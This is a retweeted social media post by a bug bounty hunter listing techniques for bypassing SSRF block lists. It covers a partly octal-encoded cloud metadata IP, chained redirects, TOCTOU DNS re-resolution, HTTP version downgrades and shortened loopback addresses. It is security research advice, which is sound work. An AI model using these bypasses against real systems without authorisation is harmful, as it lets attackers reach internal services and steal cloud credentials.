Gokul retweetledi
Alright so to end 2025 I am going to post something that people have been requesting for quite some time.. As alot know, I have made over $1 million dollars from SSRF vulnerabilities alone. #ssrftips Below I will provide some information on some of the ways that I beat the blacklists/deny lists and cashed in. Any method I post below has worked for me personally in the past. I am not claiming that any of these ways are 'my' discoveries, and in no way am I trying to claim other's work as my own. Simply answering a question that gets asked of me almost daily. #bugbounty #bugbountytips #togetherwehitharder #ittakesacrowd #hackers #hacking #NewYearsEveBountyTips
So lets get into it:
Encoding:
Everyone knows (or should know) about the ability to encode IP addresses. What alot of people dont know is that you can combine encoding types on a single IP. SO instead of encoding the entire IP, encode single octets etc.
Example: Changing the Metadata IP to: 0251.254.169.254 this octal encodes the 1st octet only, leaving the rest of the IP the same. This is the exact method that allowed for my $180,000 from the Yahoo Bug Bounty Program in Oct 2018
Redirects:
Alot of SSRF vulnerable functionality will follow redirects. What many people dont consider is multiple redirects. Never stop at just one. I have found many instances where an SSRF followed all redirects, and would properly block the final redirect to the target internal service (internal ip/metadata server). DO NOT STOP AT 1 REDIRECT! Instead of a single redirect, setup a simple php redirect script that will redirect the request back to the same end point multiple times before finally sending to the target IP/host. I have had many instances in the past where the target properly checks the response of the first 1,2, 3 ....6 redirects then magically on the 7th it no longer performs any valdiation and allows you to hit the metadata. I can't explain why this happens, but its happened enough that this is one of the very first things i test for when it comes to SSRF testing.
TOCTOU:
This is one of my fav's because it almost always can be used to bypass the initial fixes for an SSRF vulnerability. TOCTOU stands for: Time of Check Time of Use. When you pass a url to an SSRF vuln end point, the backend will take the host of this, resolve it (if its not already an IP), check against the allow/block list, then take action. Many frameworks will not cache the DNS lookup response that happens during the initial validation phase. When they forget to do this, having a subdomain properly setup for a TOCTOU check can allow for tricking their checks to allow for hitting banned resources.
How it works: Server resolves aws.dawgyg.net to 1.1.1.1 and does their checks to make sure its not a blocked IP. After passing these checks the domain is passed to the function that will actually make the call. If the server did not cache the previous response, it will then resolve the host again as part of the flow to make the request. If you have a properly setup nameserver for this attack, then the instance they make the 1st DNS call, your server quickly changes the DNS entry and points it to the target IP (Metadata/Internal), so that when it gets to the function that makes the request, it resolves the host again and makes the request.
HTTP 2 vs HTTP/1.1 vs HTTP/1.0 vs HTTP/0.9
Several have had success with this in the past. And again, I am not sure why this works sometimes. But if the request is using HTTP/2 and blocks your attempt, try and change it to an older version. I have had success with each of the above at least once (most of the time on Yahoo, but others as well).
Simple/more common things:
dns rebinding, create a hostname on your domain pointing to localhost or an internal IP.
simplify the IP. example: 127.0.0.1 is blocked, so try 127.1, or 0.0.0.0, 0 etc.
Theres tons of other ways that you can get creative and do things like this. This post is just sharing some of the more fun/more unique ways that I have had success in the past. This is not ment to be an exhaustive list of things to try, and is only ment to start your brain working to come up with weird/random/fun ways to beat the black lists.
If you like the information, drop a like/comment/follow and let me know which of the above you have tried in the past, or are looking forward to trying out in 2026. If you end up having success with these, let me know as well!
English
